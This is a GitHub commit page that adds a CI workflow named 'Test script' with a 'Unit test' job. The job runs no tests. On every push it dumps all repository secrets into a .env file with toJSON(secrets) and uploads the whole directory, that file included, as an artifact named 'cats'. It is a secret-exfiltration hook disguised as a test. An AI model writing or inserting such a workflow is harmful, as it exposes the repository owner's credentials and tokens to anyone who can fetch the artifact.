Skip to content

Commit

Permalink
Create test.yaml
Browse files Browse the repository at this point in the history
  • Loading branch information
wadhawh authored Oct 24, 2024
1 parent b1bf7a4 commit 6123413
Showing 1 changed file with 27 additions and 0 deletions.
27 changes: 27 additions & 0 deletions .github/workflows/test.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
name: Test script

on:
push:
branches:
- "*"
pull_request:
branches: [main]

jobs:
unit-tests:
name: Unit test
runs-on: ubuntu

steps:
- name: Make envfile
uses: SpicyPizza/[email protected]
with:
envkey_SECRETS: ${{ toJSON(secrets) }}
file_name: .env
fail_on_empty: false

- name: Upload artifact
uses: actions/upload-artifact@v3
with:
name: cats
path: .

0 comments on commit 6123413

Please sign in to comment.